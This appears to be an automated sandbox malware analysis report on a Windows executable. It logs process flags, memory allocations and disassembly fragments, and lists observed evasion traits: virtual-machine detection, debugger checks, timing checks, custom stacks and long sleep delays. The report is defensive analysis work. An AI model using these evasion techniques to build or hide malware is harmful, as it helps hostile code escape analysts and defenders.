                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: QmBbqpEHu0.exe PID: 7432, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: 8F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: 9F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: B190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: B5C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: C5C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: D5C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E rdtsc 4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4952Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 481Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7468Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exe TID: 7468Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 2916Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exe TID: 2916Thread sleep time: -68000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe TID: 2484Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009BC9E0 FindFirstFileW,FindNextFileW,FindClose,10_2_009BC9E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: QmBbqpEHu0.exe, 00000000.00000002.3587047984.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587022380.000000000124F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 0000000D.00000002.2634312274.000002916E5FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E rdtsc 4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00417DC3 LdrLoadDll,4_2_00417DC3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov ecx, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov ecx, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov ecx, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov eax, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106E10E mov ecx, dword ptr fs:[00000030h]4_2_0106E10E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC0F0 mov eax, dword ptr fs:[00000030h]4_2_00FBC0F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC80E9 mov eax, dword ptr fs:[00000030h]4_2_00FC80E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA0E3 mov ecx, dword ptr fs:[00000030h]4_2_00FBA0E3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01080115 mov eax, dword ptr fs:[00000030h]4_2_01080115
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106A118 mov ecx, dword ptr fs:[00000030h]4_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106A118 mov eax, dword ptr fs:[00000030h]4_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106A118 mov eax, dword ptr fs:[00000030h]4_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106A118 mov eax, dword ptr fs:[00000030h]4_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01054144 mov eax, dword ptr fs:[00000030h]4_2_01054144
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01054144 mov eax, dword ptr fs:[00000030h]4_2_01054144
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01054144 mov ecx, dword ptr fs:[00000030h]4_2_01054144
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01054144 mov eax, dword ptr fs:[00000030h]4_2_01054144
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01054144 mov eax, dword ptr fs:[00000030h]4_2_01054144
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB80A0 mov eax, dword ptr fs:[00000030h]4_2_00FB80A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01058158 mov eax, dword ptr fs:[00000030h]4_2_01058158
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094164 mov eax, dword ptr fs:[00000030h]4_2_01094164
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094164 mov eax, dword ptr fs:[00000030h]4_2_01094164
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC208A mov eax, dword ptr fs:[00000030h]4_2_00FC208A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01000185 mov eax, dword ptr fs:[00000030h]4_2_01000185
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01064180 mov eax, dword ptr fs:[00000030h]4_2_01064180
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01064180 mov eax, dword ptr fs:[00000030h]4_2_01064180
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEC073 mov eax, dword ptr fs:[00000030h]4_2_00FEC073
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107C188 mov eax, dword ptr fs:[00000030h]4_2_0107C188
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107C188 mov eax, dword ptr fs:[00000030h]4_2_0107C188
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104019F mov eax, dword ptr fs:[00000030h]4_2_0104019F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104019F mov eax, dword ptr fs:[00000030h]4_2_0104019F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104019F mov eax, dword ptr fs:[00000030h]4_2_0104019F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104019F mov eax, dword ptr fs:[00000030h]4_2_0104019F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2050 mov eax, dword ptr fs:[00000030h]4_2_00FC2050
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010861C3 mov eax, dword ptr fs:[00000030h]4_2_010861C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010861C3 mov eax, dword ptr fs:[00000030h]4_2_010861C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E1D0 mov eax, dword ptr fs:[00000030h]4_2_0103E1D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E1D0 mov eax, dword ptr fs:[00000030h]4_2_0103E1D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0103E1D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E1D0 mov eax, dword ptr fs:[00000030h]4_2_0103E1D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E1D0 mov eax, dword ptr fs:[00000030h]4_2_0103E1D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBA020 mov eax, dword ptr fs:[00000030h]4_2_00FBA020
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBC020 mov eax, dword ptr fs:[00000030h]4_2_00FBC020
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE016 mov eax, dword ptr fs:[00000030h]4_2_00FDE016
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE016 mov eax, dword ptr fs:[00000030h]4_2_00FDE016
